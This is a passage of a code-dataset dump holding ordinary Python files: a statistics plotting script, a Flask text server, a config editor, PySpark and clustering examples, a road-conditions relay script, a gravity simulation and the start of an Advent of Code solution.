colors\n\nfrom matplotlib import cm\nfrom matplotlib import rc\n\n__author__ = 'ernesto'\n\n# whether to use latex or mathtext\nrc('text', usetex=True)\nrc('mathtext', fontset='cm')\n\n# auxiliary function for plot ticks of equal length in x and y axes despite their scales.\ndef convert_display_to_data_coordinates(transData, length=10):\n    # create a transform which will take from display to data coordinates\n    inv = transData.inverted()\n    # transform from display coordinates to data coordinates in x axis\n    data_coords = inv.transform([(0, 0), (length, 0)])\n    # get the length of the segment in data units\n    yticks_len = data_coords[1, 0] - data_coords[0, 0]\n    # transform from 
display coordinates to data coordinates in y axis\n data_coords = inv.transform([(0, 0), (0, length)])\n # get the length of the segment in data units\n xticks_len = data_coords[1, 1] - data_coords[0, 1]\n return xticks_len, yticks_len\n\n\n#####################################\n# PARAMETERS - This can be modified #\n#####################################\n\n# normal pdf variances\nvar1 = 0.5\nvar2 = 2\nvar_std = 1\n# normal pdf mean\ntheta = 6\nepsilon = 1.5\n\n# maximum deviation from the mean where to plot each gaussian\nmax_mean_dev = 3.1 * var2\n\n#####################\n# END OF PARAMETERS #\n#####################\n\n# abscissa values\nxmin = theta - max_mean_dev\nxmax = theta + max_mean_dev\n\nx = np.linspace(xmin, xmax, 300)\n# normal distribution and density values in x\npdf_var1 = norm.pdf(x, theta, math.sqrt(var1))\npdf_var2 = norm.pdf(x, theta, math.sqrt(var2))\npdf_std = norm.pdf(x, theta, math.sqrt(var_std))\n\n\n# axis parameters\ndx = xmax / 20\nxmin_ax = xmin - dx\nxmax_ax = xmax + dx\n\nym = np.amax(pdf_var1)\nymax_ax = ym + ym / 10\nymin_ax = -ym / 10\n\n# areas to fill limits\npdf1_xinf = np.linspace(xmin, theta-epsilon, 50)\npdf1_inf = norm.pdf(pdf1_xinf, theta, math.sqrt(var1))\npdf1_xsup = np.linspace(theta+epsilon, xmax, 50)\npdf1_sup = norm.pdf(pdf1_xsup, theta, math.sqrt(var1))\npdf2_xinf = np.linspace(xmin, theta-epsilon, 50)\npdf2_inf = norm.pdf(pdf2_xinf, theta, math.sqrt(var2))\npdf2_xsup = np.linspace(theta+epsilon, xmax, 50)\npdf2_sup = norm.pdf(pdf2_xsup, theta, math.sqrt(var2))\n\nepsilon1 = epsilon / math.sqrt(var1)\nepsilon2 = epsilon / math.sqrt(var2)\npdfstd1_xinf = np.linspace(xmin, theta-epsilon1, 50)\npdfstd1_inf = norm.pdf(pdfstd1_xinf, theta, math.sqrt(var_std))\npdfstd1_xsup = np.linspace(theta+epsilon1, xmax, 50)\npdfstd1_sup = norm.pdf(pdfstd1_xsup, theta, math.sqrt(var_std))\npdfstd2_xinf = np.linspace(xmin, theta-epsilon2, 50)\npdfstd2_inf = norm.pdf(pdfstd2_xinf, theta, math.sqrt(var_std))\npdfstd2_xsup = np.linspace(theta+epsilon2, xmax, 50)\npdfstd2_sup = norm.pdf(pdfstd2_xsup, theta, math.sqrt(var_std))\n\n\n# length of the ticks for all subplot (6 pixels)\ndisplay_length = 6 # in pixels\n# x ticks labels margin\nxtm = -0.09\nytm = 0.4\n# font size\nfontsize = 14\n# colors from coolwarm\ncNorm = colors.Normalize(vmin=0, vmax=1)\nscalarMap = cm.ScalarMappable(norm=cNorm, cmap=cm.coolwarm)\ncol10 = scalarMap.to_rgba(0)\ncol20 = scalarMap.to_rgba(1)\n\nfig = plt.figure(0, figsize=(10, 6), frameon=False)\n\n# PLOT OF F(x | x < a)\nax = plt.subplot2grid((2, 8), (0, 0), rowspan=1, colspan=4)\n\nplt.xlim(xmin_ax, xmax_ax)\nplt.ylim(ymin_ax, ymax_ax)\n\n# horizontal and vertical ticks length\nxtl, ytl = convert_display_to_data_coordinates(ax.transData, length=display_length)\n\n# axis arrows\nplt.annotate(\"\", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\nplt.annotate(\"\", xytext=(0, ymin_ax), xycoords='data', xy=(0, ymax_ax), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\n\nplt.plot(x, pdf_var1, color='k', linewidth=2)\n\n# filled areas\nax.fill_between(pdf1_xinf, 0, pdf1_inf, color=col10)\nax.fill_between(pdf1_xsup, 0, pdf1_sup, color=col10)\n\n# xlabels and xtickslabels\nplt.plot([theta, theta], [0, xtl], 'k')\nplt.plot([theta-epsilon, theta-epsilon], [0, xtl], 'k')\nplt.plot([theta+epsilon, theta+epsilon], [0, xtl], 'k')\nplt.text(theta, xtm, '$\\\\theta$', 
fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta-epsilon, xtm, '$\\\\theta-\\epsilon$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta+epsilon, xtm, '$\\\\theta+\\epsilon$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(xmax_ax, xtm, '$\\hat{\\\\theta}$', fontsize=fontsize, ha='right', va='baseline')\nplt.text(ytm, ymax_ax, '$p(\\hat{\\\\theta})=\\mathcal{N}(\\\\theta,\\,\\sigma^2_{\\hat{\\\\theta}})$',\n fontsize=fontsize, ha='left', va='center')\n\n\nplt.text(xmax_ax+0.4, ymax_ax, '$\\sigma^2_{\\hat{\\\\theta}}<\\sigma^2_{\\check{\\\\theta}}$',\n fontsize=fontsize, ha='center', va='center')\n\nplt.axis('off')\n\n\n##\nax = plt.subplot2grid((2, 8), (0, 4), rowspan=1, colspan=4)\n\nplt.xlim(xmin_ax, xmax_ax)\nplt.ylim(ymin_ax, ymax_ax)\n\n# axis arrows\nplt.annotate(\"\", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\nplt.annotate(\"\", xytext=(theta, ymin_ax), xycoords='data', xy=(theta, ymax_ax), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\n\nplt.plot(x, pdf_std, color='k', linewidth=2)\n\n# filled areas\nax.fill_between(pdfstd1_xinf, 0, pdfstd1_inf, color=col10)\nax.fill_between(pdfstd1_xsup, 0, pdfstd1_sup, color=col10)\n\nxtm2 = -0.11\n# xlabels and xtickslabels\nplt.plot([theta-epsilon1, theta-epsilon1], [0, xtl], 'k')\nplt.plot([theta+epsilon1, theta+epsilon1], [0, xtl], 'k')\n# plt.text(theta-epsilon1, xtm, '$$-\\epsilon/\\sqrt{\\\\textrm{var}(\\hat{\\\\theta})}$$',\n# fontsize=fontsize, ha='center', va='baseline')\n# plt.text(theta-epsilon1, xtm, '$$-\\\\frac{\\epsilon}{\\sigma_{\\hat{\\\\theta}}}$$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta-epsilon1, xtm2, '$-\\epsilon/\\sigma_{\\hat{\\\\theta}}$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta+epsilon1, xtm2, '$\\epsilon/\\sigma_{\\hat{\\\\theta}}$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(xmax_ax, xtm2, '$(\\hat{\\\\theta}-\\\\theta$)/\\sigma_{\\hat{\\\\theta}}',\n fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta + ytm, ymax_ax, '$p((\\hat{\\\\theta}-\\\\theta$)/\\sigma_{\\hat{\\\\theta}})=\\mathcal{N}(0,\\,1)$',\n fontsize=fontsize, ha='left', va='center')\nplt.axis('off')\n\n\n#########################\n#########################\n\nax = plt.subplot2grid((2, 8), (1, 0), rowspan=1, colspan=4)\n\nplt.xlim(xmin_ax, xmax_ax)\nplt.ylim(ymin_ax, ymax_ax)\n\n# axis arrows\nplt.annotate(\"\", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\nplt.annotate(\"\", xytext=(0, ymin_ax), xycoords='data', xy=(0, ymax_ax), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\n\nplt.plot(x, pdf_var2, color='k', linewidth=2)\n\n# filled areas\nax.fill_between(pdf2_xinf, 0, pdf2_inf, color=col10)\nax.fill_between(pdf2_xsup, 0, pdf2_sup, color=col10)\n\n# xlabels and xtickslabels\nplt.plot([theta, theta], [0, xtl], 'k')\nplt.plot([theta-epsilon, theta-epsilon], [0, xtl], 'k')\nplt.plot([theta+epsilon, theta+epsilon], [0, xtl], 'k')\nplt.text(theta, xtm, '$\\\\theta$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta-epsilon, xtm, '$\\\\theta-\\epsilon$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta+epsilon, xtm, '$\\\\theta+\\epsilon$', fontsize=fontsize, 
ha='center', va='baseline')\nplt.text(xmax_ax, xtm, '$\\check{\\\\theta}$', fontsize=fontsize, ha='right', va='baseline')\nplt.text(ytm, ymax_ax, '$p(\\check{\\\\theta})=\\mathcal{N}(\\\\theta,\\,\\sigma^2_{\\check{\\\\theta}})$',\n fontsize=fontsize, ha='left', va='center')\nplt.axis('off')\n\n##\nax = plt.subplot2grid((2, 8), (1, 4), rowspan=1, colspan=4)\n\nplt.xlim(xmin_ax, xmax_ax)\nplt.ylim(ymin_ax, ymax_ax)\n\n# axis arrows\nplt.annotate(\"\", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\nplt.annotate(\"\", xytext=(theta, ymin_ax), xycoords='data', xy=(theta, ymax_ax), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\n\nplt.plot(x, pdf_std, color='k', linewidth=2)\n\n# filled areas\nax.fill_between(pdfstd2_xinf, 0, pdfstd2_inf, color=col10)\nax.fill_between(pdfstd2_xsup, 0, pdfstd2_sup, color=col10)\n\nxtm2 = -0.11\n# xlabels and xtickslabels\nplt.plot([theta-epsilon2, theta-epsilon2], [0, xtl], 'k')\nplt.plot([theta+epsilon2, theta+epsilon2], [0, xtl], 'k')\nplt.text(theta-epsilon2, xtm2, '$-\\epsilon/\\sigma_{\\check{\\\\theta}}$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta+epsilon2, xtm2, '$\\epsilon/\\sigma_{\\check{\\\\theta}}$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(xmax_ax, xtm2, '$(\\check{\\\\theta}-\\\\theta$)/\\sigma_{\\check{\\\\theta}}',\n fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta + ytm, ymax_ax, '$p((\\check{\\\\theta}-\\\\theta$)/\\sigma_{\\check{\\\\theta}})=\\mathcal{N}(0,\\,1)$',\n fontsize=fontsize, ha='left', va='center')\nplt.axis('off')\n\n\n# save as pdf image\nplt.savefig('problem_2_7.pdf', bbox_inches='tight')\n\nplt.show()\n\n","sub_path":"figuras/PycharmKayStatisticalReport/problem_2_7.py","file_name":"problem_2_7.py","file_ext":"py","file_size_in_byte":9522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"402047582","text":"from flask import Flask, request, send_from_directory\nimport towels\napp = Flask(__name__)\n\n@app.route('/', defaults={'path': 'index.html'})\n@app.route('//')\ndef index(path):\n return send_from_directory('pages', path)\n\n@app.route('/gen/', defaults={'num': 3, 'corpus': 'full'})\n@app.route('/gen//', defaults={'corpus': 'full'})\n@app.route('/gen///')\ndef generate(num, corpus):\n if num > 42:\n return 'Sentence limit exceeded.'\n return towels.generate(num, corpus)\n\n@app.route('/gen/s/', defaults={'char': 140, 'corpus': 'full'})\n@app.route('/gen/s//', defaults={'corpus': 'full'})\n@app.route('/gen/s///')\ndef generate_sentence(char, corpus):\n if char > 420:\n return 'Character limit exceeded.'\n sentence = towels.generate_sentence(char, corpus)\n if sentence is None:\n return ''\n return sentence\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=22109)\n\n","sub_path":"webserv.py","file_name":"webserv.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"594464271","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/jeju/executor/editor.py\n# Compiled at: 2016-11-09 20:33:52\nimport string, ConfigParser, io, logging\n\ndef replaceable(code, kv):\n keys = kv.keys()\n for key in 
keys:\n        nkey = '${%s}' % key\n        code = string.replace(code, nkey, kv[key])\n\n    logging.debug('####################' + '\\n%s' % code)\n    logging.debug('####################')\n    return code\n\n\ndef find_file_path(lookahead):\n    if lookahead == None:\n        return\n    else:\n        ctx = lookahead['text']\n        items = ctx.split()\n        if items[0] == 'edit':\n            return items[1]\n        return\n\n\ndef editor_text(**kwargs):\n    lookahead = kwargs['lookahead']\n    code = kwargs['code']\n    kv = kwargs['kv']\n    file_path = find_file_path(kwargs['lookahead'])\n    if file_path == None:\n        msg = 'Cannot find content:%s' % lookahead['text']\n        logging.error(msg)\n        return msg\n    else:\n        fp = open(file_path, 'w')\n        rcode = replaceable(code, kv)\n        fp.write(rcode)\n        fp.close()\n        return {'output': rcode}\n\n\ndef editor_ini(**kwargs):\n    lookahead = kwargs['lookahead']\n    code = kwargs['code']\n    kv = kwargs['kv']\n    added = ConfigParser.RawConfigParser(allow_no_value=True)\n    rcode = replaceable(code, kv)\n    added.readfp(io.BytesIO(rcode))\n    file_path = find_file_path(kwargs['lookahead'])\n    if file_path == None:\n        msg = 'Cannot find content path: %s' % lookahead['text']\n        logging.error(msg)\n        return msg\n    else:\n        orig = ConfigParser.ConfigParser()\n        orig.readfp(open(file_path))\n        for section in added.sections():\n            if orig.has_section(section) == False:\n                msg = 'Add new section'\n                logging.debug(msg)\n                orig.add_section(section)\n            for item, value in added.items(section):\n                if item == '...':\n                    msg = 'abbreviation'\n                else:\n                    orig.set(section, item, value)\n\n        fp = open(file_path, 'w')\n        orig.write(fp)\n        new_content = orig.readfp(open(file_path))\n        fp.close()\n        return {'output': new_content}","sub_path":"pycfiles/jeju-0.3.6-5.linux-x86_64.tar/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"581111198","text":"from environment import spark\nfrom pyspark.ml.feature import Word2Vec\n\ndocumentDF = spark.createDataFrame([\n    (\"Hi I heard about Spark\".split(\" \"), ),\n    (\"I wish Java could use case classes\".split(\" \"), ),\n    (\"Logistic regression models are neat\".split(\" \"), )\n], [\"text\"])\n\nword2Vec = Word2Vec(vectorSize=3, minCount=0, inputCol=\"text\", outputCol=\"result\")\nmodel = word2Vec.fit(documentDF)\n\nresult = model.transform(documentDF)\nresult.show(truncate=False)\n","sub_path":"basic-mllib/Word2Vec_/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"86314463","text":"# coding: utf-8\n\n# Usage\n# Extracts the point cloud from the file generated by reduce_jsons_4_trajectories.py, clusters it with the mean-shift method,\n# and outputs the convergence point of each cluster.\n# The first argument gives the averaging radius in meters; the second argument gives the convergence-distance threshold.\n# python3 src/mean_shift/mean_shift.py 100.0 10.0\n\nimport json\nimport sys\nimport glob\nimport calendar\nimport datetime\nimport os\nimport math\n\nparam = sys.argv\ncurrent_time = datetime.datetime.today()\n\nradius_of_mean = float(param[1])\nradius_of_convergence = float(param[2])\n\ndirectory_path = 'result/mean_shift/result_' + str(current_time.year) + '_' + str(current_time.month) + '_' + str(current_time.day) + '_' + str(current_time.hour) + '_' + str(current_time.minute)\nfw_points_path = directory_path + '/points.json'\nfw_groups_path = directory_path + '/groups.json'\nfr_reduced_path = 'data/mean_shift/reduced_jsons/reduced.json'\n\ndef latlngToDistance(lat1, lng1, lat2, lng2):\n\t# constants ( GRS80 ( world geodetic system ) )\n\tGRS80_R_X = 6378137.000000 # equatorial radius\n\tGRS80_R_Y = 6356752.314140 # polar radius\n\tr_x = GRS80_R_X\n\tr_y = GRS80_R_Y\n\tdif_lat = math.pi * (lat1 - lat2) / 180.0\n\tdif_lng = math.pi * (lng1 - lng2) / 180.0\n\tmean_lat = math.pi * (lat1 + lat2) / 180.0 / 2.0\n\teccentricity = math.sqrt(( r_x ** 2 - r_y ** 2 ) / ( r_x ** 2 ))\n\tw = math.sqrt(1.0 - (eccentricity ** 2) * (math.sin(mean_lat) ** 2))\n\tm = r_x * ( 1.0 - eccentricity ** 2 ) / ( w ** 3 )\n\tn = r_x / w\n\td = math.sqrt((dif_lng * m) ** 2 + (dif_lat * n * math.cos(mean_lat)) ** 2)\n\treturn d\n\ndef decideNextPoint(this_point):\n\tmean_lat = 0.0\n\tmean_lng = 0.0\n\tsum_lat = 0.0\n\tsum_lng = 0.0\n\tnum_elements = 0.0\n\tglobal is_convergent\n\tfor point in points:\n\t\tdistance_between_2_points = latlngToDistance(this_point[\"present_point\"][\"lat\"], this_point[\"present_point\"][\"lng\"], point[\"present_point\"][\"lat\"], point[\"present_point\"][\"lng\"])\n\t\tif not distance_between_2_points <= radius_of_mean:\n\t\t\tcontinue\n\t\tnum_elements += 1.0\n\t\tsum_lat += point[\"present_point\"][\"lat\"]\n\t\tsum_lng += point[\"present_point\"][\"lng\"]\n\t\tif not distance_between_2_points <= radius_of_convergence:\n\t\t\tis_convergent = False\n\tmean_lat = sum_lat / num_elements\n\tmean_lng = sum_lng / num_elements\n\tthis_point[\"next_point\"][\"lat\"] = mean_lat\n\tthis_point[\"next_point\"][\"lng\"] = mean_lng\n\treturn this_point\n\ndef updatePoint(this_point):\n\tthis_point[\"present_point\"][\"lat\"] = this_point[\"next_point\"][\"lat\"]\n\tthis_point[\"present_point\"][\"lng\"] = this_point[\"next_point\"][\"lng\"]\n\treturn this_point\n\ndef decideGroupID():\n\tglobal points\n\tcurrent_group_id = 0\n\tfor pointA in points:\n\t\tif \"group_id\" in pointA:\n\t\t\tcontinue\n\t\tpointA[\"group_id\"] = current_group_id\n\t\tcurrent_group_id += 1\n\t\tfor pointB in points:\n\t\t\tif \"group_id\" in pointB:\n\t\t\t\tcontinue\n\t\t\tdistance_between_2_points = latlngToDistance(pointA[\"present_point\"][\"lat\"], pointA[\"present_point\"][\"lng\"], pointB[\"present_point\"][\"lat\"], pointB[\"present_point\"][\"lng\"])\n\t\t\tif distance_between_2_points <= radius_of_convergence:\n\t\t\t\tpointB[\"group_id\"] = pointA[\"group_id\"]\n\tnum_group = current_group_id\n\treturn num_group\n\ndef decideMeansOfEachGroup():\n\tmeans_of_each_group = []\n\tfor i in range(num_group):\n\t\tmean_point = {\"group_id\": i ,\"lat\": 0.0, \"lng\": 0.0, \"num_points\": 0}\n\t\tfor point in points:\n\t\t\tif point[\"group_id\"] == i:\n\t\t\t\tmean_point[\"lat\"] += point[\"present_point\"][\"lat\"]\n\t\t\t\tmean_point[\"lng\"] += point[\"present_point\"][\"lng\"]\n\t\t\t\tmean_point[\"num_points\"] += 1\n\t\tmean_point[\"lat\"] = mean_point[\"lat\"] / mean_point[\"num_points\"]\n\t\tmean_point[\"lng\"] = mean_point[\"lng\"] / mean_point[\"num_points\"]\n\t\tmeans_of_each_group.append(mean_point)\n\treturn means_of_each_group\n\n\nprint(\"reading file\")\nprint(str(datetime.datetime.today()))\n\nfr_reduced = open(fr_reduced_path,'r')\npoints = []\nfor line in fr_reduced:\n\ttweet = json.loads(line)\n\tpoints.append({\"tweet_id\": tweet[\"tweet_id\"], \"present_point\": {\"lat\": float(tweet[\"coordinates\"][1]), \"lng\": float(tweet[\"coordinates\"][0])}, \"next_point\": {\"lat\": 0.0, \"lng\": 0.0}})\n\n\nprint(\"doing mean-shift\")\nprint(str(datetime.datetime.today()))\n\nis_convergent = False\nwhile(is_convergent == False):\n\tis_convergent = True\n\tfor i, point in enumerate(points):\n\t\tpoints[i] = decideNextPoint(point)\n\tfor i, point in enumerate(points):\n\t\tpoints[i] = 
updatePoint(point)\n\tprint(str(datetime.datetime.today()))\n\n\nprint(\"deciding the group of each point\")\nprint(str(datetime.datetime.today()))\n\t\t\nnum_group = decideGroupID()\n\n\nprint(\"deciding the mean point of each group\")\nprint(str(datetime.datetime.today()))\n\nmeans_of_each_group = decideMeansOfEachGroup()\n\n\nprint(\"outputting\")\nprint(str(datetime.datetime.today()))\n\nos.mkdir(directory_path)\n\nfr_reduced = open('data/mean_shift/reduced_jsons/reduced.json','r')\nfor i,line in enumerate(fr_reduced):\n\ttweet = json.loads(line)\n\ttweet.update({\"group_id\": points[i][\"group_id\"]})\n\tfw = open(fw_points_path, 'a')\n\tfw.write(json.dumps(tweet))\n\tfw.write('\\n')\n\tfw.close()\n\nfor mean in means_of_each_group:\n\tfw = open(fw_groups_path, 'a')\n\tfw.write(json.dumps(mean))\n\tfw.write('\\n')\n\tfw.close()\n\n","sub_path":"src/mean_shift/mean_shift.py","file_name":"mean_shift.py","file_ext":"py","file_size_in_byte":5113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206145365","text":"def decodificar(mensaje):\n    linea=mensaje.split(\",\")\n    palabra=\"\"\n    n=0\n\n    for i in linea:\n        n=decimal(i)\n        palabra+=chr(n)\n\n    return palabra\n\ndef decimal(n):\n    n=int(n,2)\n    return n\n\n\nif __name__ == \"__main__\":\n    mensaje=decodificar(\"01101000,01101111,01101100,01100001\")\n    print(mensaje)\n","sub_path":"tema9_ej3/tema9_ej3_1563468J.py","file_name":"tema9_ej3_1563468J.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"644081935","text":"\n\n# Iowa Road Conditions processing script\n# daryl herzmann akrherz@iastate.edu 19 Nov 2009\n# installed by Shane Searcy, ITO DMX, shane.searcy@noaa.gov\n#\n# REQUIRES: the 'mx' package installed (standard yum install mx)\n#\n# 1) Download file from website\n# 2) Compare with old file to see if they are any different\n#  IF DIFFERENT\n# 3) Replace Headers with NWS mandated stuff\n# 4) Write file to hard drive\n# 5) scp file to ls1-dmx:/data/Incoming for dissemination\n\nHTTP_SRC = \"http://ia.carsprogram.org/IAcarssegment/IA_road_conditions.txt\"\n#FINAL_LOCATION = \"/data/Incoming/WAN_NWWSDSMSTOIA.dat\"\nFINAL_LOCATION = \"/tmp/LOC_DSMSTOIA.dat\"\nLOG_FILENAME = \"/tmp/STOIA_acquisition.log\"\nPREV_PRODUCT = \"/tmp/prevSTOIA.txt\"\n\nimport urllib2, logging, traceback, sys, os, tempfile, StringIO\nimport datetime\nLOGFORMAT = \"%(asctime)-15s:: %(message)s\"\nlogging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG,\n                    format=LOGFORMAT)\n\ndef compare_product( newdata ):\n    \"\"\"\n    Compares newly downloaded data with previously saved version\n    @return boolean if the data is new!\n    \"\"\"\n    if not os.path.isfile( PREV_PRODUCT ):\n        logging.debug(\"Previous datafile %s not found\" % (PREV_PRODUCT,))\n        return True\n\n    # Always send the 3:01 a.m. 
report\n now = datetime.datetime.now()\n if now.minute == 1 and now.hour == 3:\n return True\n\n # Make sure the product is complete...\n if newdata.find(\"800-762-3947\") == -1:\n return False\n\n olddata = open( PREV_PRODUCT, 'r').read()\n if olddata != newdata:\n logging.debug(\"Datafile is new!\")\n return True\n\n return False\n\ndef ship2ldad( data ):\n \"\"\"\n Writes the data to a file for LDAD to then deal with\n \"\"\"\n f = open (\"/tmp/pre_ldad_STOIA.txt\", 'w')\n f.write( data )\n f.close()\n\n\n logging.debug(\"Shipping %s product to LDAD via scp\" % (f.name,) )\n os.system(\"cp %s %s\" % (f.name, FINAL_LOCATION) )\n os.system(\"python /home/ldm/pyWWA/util/make_text_noaaportish.py %s\" % (FINAL_LOCATION,))\n os.system(\"cat %s | python /home/ldm/pyWWA/parsers/stoia_parser.py\" % (FINAL_LOCATION,))\n\ndef fix_header( data ):\n \"\"\"\n Fixes the header the file has to make NWS protocols\n @return String fixed file\n \"\"\"\n # Formulate the new header\n now = datetime.datetime.now()\n utcnow = datetime.datetime.utcnow()\n newdata = \"\"\"000\nSXUS43 KDMX %s\nSTOIA\n\nIOWA ROAD CONDITIONS\nIOWA DEPARTMENT OF PUBLIC SAFETY\nRELAYED BY THE NATIONAL WEATHER SERVICE DES MOINES IA\n%s\n\n\"\"\" % (utcnow.strftime(\"%d%H%M\"), (now.strftime(\"%-I%M %p CST %a %b %d %Y\").upper()),)\n\n # Strip off everything before the first *\n return newdata + data[data.find(\"*\"):]\n return newdata + data \n \ndef save_data( data ):\n \"\"\"\n Save the data in a file for future comparisons\n \"\"\"\n f = open( PREV_PRODUCT , 'w')\n f.write( data )\n f.close()\n logging.debug(\"Saved downloaded data to %s\" % (PREV_PRODUCT,))\n\nlogging.debug(\"_______________ Starting download\")\ntry:\n data = urllib2.urlopen( HTTP_SRC ).read()\n data = data[data.find(\"*\"):]\n\nexcept:\n logging.error(\"Download Failure!, Abort\")\n ebuf = StringIO.StringIO()\n traceback.print_exc(file=ebuf)\n ebuf.seek(0)\n logging.error( ebuf.read() )\n logging.debug(\"__ END\")\n sys.exit()\n\nlogging.debug(\"Downloaded %s bytes\" % (len(data),))\n\nisnew = compare_product( data )\n\nsave_data(data)\n\nif isnew:\n data = fix_header( data )\n ship2ldad( data )\n\nlogging.debug(\"__ END\")\n","sub_path":"scripts/roads/stoia.py","file_name":"stoia.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"162443644","text":"def remove_files(file_names):\n \"\"\" removes files \"\"\"\n\n import os, glob\n\n list_files= glob.glob(file_names + '*')\n\n try:\n for f in list_files:\n os.remove(f)\n print('FILES REMOVED')\n except:\n print('FAIL TO REMOVE FILES')\n\n\ndef save_it(data, file_name):\n \"\"\" save list: data, filename \"\"\"\n\n def timeStamped(fname, fmt='{fname}_%Y-%m-%d-%H%M%S.txt'):\n import datetime\n return datetime.datetime.now().strftime(fmt).format(fname=fname)\n\n try:\n with open(timeStamped(file_name), \"w\") as f:\n f.write('\\n'.join(str(line) for line in data))\n\n print(\"DATA SAVED\")\n\n except:\n print(\"FAIL TO SAVE DATA\")\n\n\ndef load_it(file_name):\n\n try:\n with open(file_name, 'r') as f:\n data = f.read()\n except:\n print(\"FAIL to READ DATA!\")\n\n data_list = [number for number in data.split(\"\\n\")]\n print(file_name, \"LOADED \")\n return(data_list)\n","sub_path":"p51/_tools.py","file_name":"_tools.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"497406350","text":"import numpy as np\n\nimport 
time\nimport util as u\n\n# simulation parameters\ndt = 0.1 # time step\nT = 3000 # number of time steps\n\n# parameters of the system\ngamma = .00002 # gravitational coefficient\nm1 = 300 # mass of the first planet\nm2 = 1 # mass of the second planet\n\n# initial conditions: state of the system in the first two time steps\nx0 = np.array([0, 0, 1, 0])\nx1 = np.array([0, 0, 1, 0.005])\n\n# initializing the vector of system states\nxs = [x0, x1]\n\n# defining the function that calculates the forces acting on the planets at a time step\ndef F(x):\n r1 = x[:2] # position of the first planet\n r2 = x[2:4] # position of the second planet\n \n posdiff_vec = r2 - r1 # vector of difference of the positions\n dist = np.linalg.norm(posdiff_vec) # distance between the planets\n \n # Newton's law of universal gravitation\n F1 = gamma * m2 * posdiff_vec / (dist**2) # force acting on the first planet\n F2 = - gamma * m1 * posdiff_vec / (dist**2) # force acting on the second planet\n \n return np.concatenate([F1, F2], axis=0)\n\n\nfor i in range(T):\n # getting previous values of the iteration\n Lx = xs[-1]\n LLx = xs[-2]\n \n # approximating the second derivative with finite differences\n F_prev = F(Lx) # force acting at the previous time step\n x = dt**2*F_prev + 2*Lx - LLx # estimated position at the next time step\n \n xs.append(x)\n\n####################################################\n\nx, y = np.split(np.array(xs), 2, axis=1)\n\nu.plotAnim(x, y, T, isSaveVideo=False)\n\n# this is slow and not working properly\n#u.plotScatter(x, y)\n","sub_path":"planets/planets.py","file_name":"planets.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"301685895","text":"'''\r\nhttps://adventofcode.com/2020/day/7\r\n'''\r\nwith open(\"input.txt\") as f:\r\n line = f.readline()\r\n inputs = {}\r\n while line:\r\n if line.split():\r\n # set the parent bag color as the KEY and the colors it holds (VALUE) as an array\r\n parentBag = ' '.join(line.split()[:3]).replace(\"bags\", \"\")\r\n childrenBags = []\r\n innerBags = ' '.join(line.split()[4:])\r\n # we don't care HOW MANY of each bag it can hold, so we filter that out\r\n for i in innerBags.split(\", \"):\r\n # append the filtered result to childrenBags array\r\n childrenBags.append(' '.join(i.split()[1:-1]))\r\n inputs[parentBag.strip()] = childrenBags\r\n line = f.readline()\r\n#print(json.dumps(inputs, indent=2))\r\n\r\n\r\ndef numBags(color):\r\n '''\r\n I had a tough time with this one, so after hours of trying, I decided to seek help online\r\n THIS CODE LOGIC CAME FROM https://www.youtube.com/watch?v=7IOd7wvxDX0\r\n Highly recommend watching. 
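# The planets script above integrates Newton's second law with a
# position-only finite-difference (Stormer-Verlet) step:
#     x_next = dt**2 * F(x_prev) + 2*x_prev - x_prev_prev
# A minimal self-contained sketch of the same update on a 1-D harmonic
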